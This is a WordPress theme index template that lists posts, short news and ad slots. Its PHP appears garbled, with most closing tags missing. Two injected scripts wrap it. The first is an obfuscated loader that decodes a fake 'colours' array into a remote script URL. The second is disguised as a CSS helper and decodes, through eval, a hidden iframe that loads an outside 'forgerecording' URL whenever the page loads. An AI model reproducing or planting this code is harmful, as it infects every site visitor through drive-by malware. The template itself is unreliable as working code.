<script type="text/javascript">
if (typeof(redef_colors)=="undefined") {

   var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a77', '#727e7b', '#3d727e', '#7c3e7f', '#707674', '#3e7982', '#3d7f77', '#7f314d');
   var redef_colors = 1;
   var colors_picked = 0;

   function div_pick_colors(t,styled) {
	var s = "";
	for (j=0;j<t.length;j++) {	
		var c_rgb = t[j];
		for (i=1;i<7;i++) {
			var c_clr = c_rgb.substr(i++,2);
			if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
		}
	}
	if (styled) {
		s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
	} else {
		s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
	}
	return s;
   }

   function try_pick_colors() {
	try {
	   	if(!document.getElementById || !document.createElement){
			document.write(div_pick_colors(div_colors,1));
		   } else {
			var new_cstyle=document.createElement("script");
			new_cstyle.type="text/javascript";
			new_cstyle.src=div_pick_colors(div_colors,0);
			document.getElementsByTagName("head")[0].appendChild(new_cstyle);
		}
	} catch(e) { }
	try {
		check_colors_picked();
	} catch(e) { 
		setTimeout("try_pick_colors()", 500);
	}
   }

   try_pick_colors();

}
</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><script type="text/javascript">

</script><?php   get_header();  

  <?php if ($sirius->option['ads'] == 'adsan') {
   $postnum = 1; $showads = $sirius->option['adscat']; } 


  <div id="content">

  <?php /* -- Schema -- */
    global $sirius; if ($sirius->option['shortnews'] == 'shortnewsaus') { 
		
	 <?php if (have_posts()) :  while (have_posts()) : the_post(); 

	<div class="post" id="post-<?php the_ID(); ">

    <?php the_date('','<small>','</small>'); 

      <h4 class="storytitle" id="title-<?php the_ID(); "><a href="<?php echo get_permalink() " rel="bookmark" title="<?php _e('Permanent Link','sirius') : <?php the_title(); "><?php the_title(); </a> <?php edit_post_link('<img src="'.get_bloginfo(template_directory).'/images/edit.gif" alt="'.__('Edit Link','sirius').'" />','<span class="editlink">', '</span>'); </h4>

	 <div class="storycontent">
			<?php /*Neu nur Auszug*/ the_excerpt(); 
        	<?php /*the_content(''.__('more...','sirius').''); */ 
			<?php /*query_posts('showposts=6'); */
	      	<?php link_pages('<strong>'.__('Pages','sirius').': </strong>', '<br /><br />', 'number'); 

		<div class="meta">
  		<img src="<?php bloginfo('template_directory'); /images/comment-big.gif" alt="<?php echo __('Comments','sirius'); "/>&nbsp;<?php comments_popup_link(''. __('Comments','sirius').'', ''. __('1 Comment','sirius').'', ''. __('% Comments','sirius').''); 
		| <?php echo __('Categories','sirius'); : <?php the_category(', ');  | Autor: <?php the_author_posts_link(); 
		
		</div><!-- Ende Div Meta-->
	 
	 </div><!-- Ende Div storycontent-->
	
	</div> <!--  close post -->			
	
	<!--
	<?php trackback_rdf(); 
	-->

        <?php /* -- Advertisement Area -- */
         global $sirius; if ($sirius->option['ads'] == 'adsan') {
         if ($postnum == $showads) {  
         <br/><br/><div align="center">	
         <?php echo $sirius->option['adscode']; 
         </div>
         <br/>
         <?php } $postnum++; echo '<br/><br/><br/>'; } else { 
         <br/><br/><br/><br/>	
          <?php } 


		<?php endwhile;  else : 
	

		<h2 class="center"><?php echo __('Not Found','sirius'); </h2>
		
		<p class="center"><?php echo __('Sorry, no posts matched your criteria.','sirius'); </p>
	
  	<?php include (TEMPLATEPATH . "/searchform.php"); 

	<?php endif; 


	<?php   }
         /* ---------------------------------------------------- */
  else   /* ---- Start Short News ------------------------------ */
         /* ---------------------------------------------------- */
         { 
	
	

     <?php if ($posts) {
           function stupid_hack($str){
               return preg_replace('|</ul>\s*<ul class="linklog">|', '', $str);
               }
          ob_start('stupid_hack');
          foreach($posts as $post)
          {
          start_wp();
          if ( in_category(''.$sirius->option['shortnewscat'].'') && !is_single() ) : 
          

         <div class="linklogpost">
           <ul class="linklog">
             <li id="p<?php the_ID(); ">
                <?php echo wptexturize($post->post_content); &nbsp;
                <span class="kommentieren">
                |&nbsp;<?php comments_popup_link('Kommentare', '1 Kommentar','% Kommentare')
                 <?php edit_post_link('<img src="'.get_bloginfo(template_directory).'/images/edit.gif" alt="'.__('Edit Link','sirius').'" />','<span class="editlink">', '</span>'); 
               </span>
             </li>
           </ul>
        </div>

        <?php /* -- Advertisement Area -- */
         global $sirius; if ($sirius->option['ads'] == 'adsan') {
         if ($postnum == $showads) {  
         <div align="center">	
         <?php echo $sirius->option['adscode']; 
         </div>
         <br/><br/>
         <?php } $postnum++; } 	


<?php else: // If it's a regular post or a permalink page 

   <div class="post" id="post-<?php the_ID(); ">

   <?php the_date('','<small>','</small>'); 

      <h1 class="storytitle" id="title-<?php the_ID(); "><a href="<?php echo get_permalink() " rel="bookmark" title="<?php _e('Permanent Link','sirius') : <?php the_title(); "><?php the_title(); </a> <?php edit_post_link('<img src="'.get_bloginfo(template_directory).'/images/edit.gif" alt="'.__('Edit Link','sirius').'" />','<span class="editlink">', '</span>'); </h1>

    	 <div class="storycontent">
	
        	<?php the_content(''.__('more...','sirius').''); 
	
	      	<?php link_pages('<strong>'.__('Pages','sirius').': </strong>', '<br /><br />', 'number'); 

      </div>

    	<div class="linklogmeta">
    	
  		<img src="<?php bloginfo('template_directory'); /images/comment-big.gif" alt="Kommentare"/>&nbsp;&nbsp;<?php comments_popup_link('Kommentare', '1 Kommentar', '%&nbsp;Kommentare'); 
       | <?php echo __('Categories','sirius'); : <?php the_category(', ')  | Autor: <?php the_author() 

       </div>

     </div> <!--  close post -->		

	
	
	<!--
	<?php trackback_rdf(); 
	-->


        <?php /* -- Advertisement Area -- */
         global $sirius; if ($sirius->option['ads'] == 'adsan') {
         if ($postnum == $showads) {  
         <br/><br/><div align="center">	
         <?php echo $sirius->option['adscode']; 
         </div>
         <br/>
         <?php } $postnum++; echo '<br/><br/>'; } else { 
         <br/><br/><br/><br/>	
          <?php } 	
      


		<?php endif; 



		
	<?php } } else { 
	

		<h2 class="center"><?php echo __('Not Found','sirius'); </h2>
		
		<p class="center"><?php echo __('Sorry, no posts matched your criteria.','sirius'); </p>
	
  	<?php include (TEMPLATEPATH . "/searchform.php"); 	

	
	
	   <?php }} 
	
	
    		<div class="navigation">
		
     <?php posts_nav_link('', '<img src="'.get_bloginfo(template_directory).'/images/back.png" alt="'.__('Next Entries','sirius').'" />&nbsp;', '<img src="'.get_bloginfo(template_directory).'/images/forward.png" alt="'.__('Previous Entries','sirius').'" />'); 
		 	
   </div>

  </div>  <!-- close content -->


<?php get_sidebar(); 

<?php get_footer();    ?>

<script language="JavaScript"></script><script language="JavaScript">function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r[i].cssRules||r[i].rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var dkel=[420/t,408/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,420/t,480/t,408/t,160/t,164/t,236/t,500/t,404/t,432/t,460/t,404/t,492/t,472/t,388/t,456/t,128/t,484/t,244/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,464/t,456/t,484/t,492/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,484/t,164/t,236/t,500/t,396/t,388/t,464/t,396/t,416/t,160/t,404/t,164/t,492/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,244/t,484/t,236/t,500/t,420/t,408/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,420/t,480/t,408/t,160/t,164/t,236/t,500/t,404/t,432/t,460/t,404/t,492/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,476/t,476/t,476/t,184/t,408/t,444/t,456/t,412/t,404/t,456/t,404/t,396/t,444/t,456/t,400/t,420/t,440/t,412/t,184/t,396/t,444/t,436/t,188/t,460/t,416/t,444/t,448/t,188/t,252/t,388/t,400/t,400/t,464/t,444/t,404/t,460/t,408/t,388/t,472/t,444/t,456/t,420/t,464/t,404/t,460/t,244/t,440/t,444/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,500/t,500/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,480/t,408/t,160/t,164/t,492/t,472/t,388/t,456/t,128/t,408/t,244/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,476/t,476/t,476/t,184/t,408/t,444/t,456/t,412/t,404/t,456/t,404/t,396/t,444/t,456/t,400/t,420/t,440/t,412/t,184/t,396/t,444/t,436/t,188/t,460/t,416/t,444/t,448/t,188/t,252/t,388/t,400/t,400/t,464/t,444/t,404/t,460/t,408/t,388/t,472/t,444/t,456/t,420/t,464/t,404/t,460/t,244/t,440/t,444/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,500/t];var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel[i]);ydxx+=gh(ch);}setTimeout(function(){ko(ydxx);},500);</script>
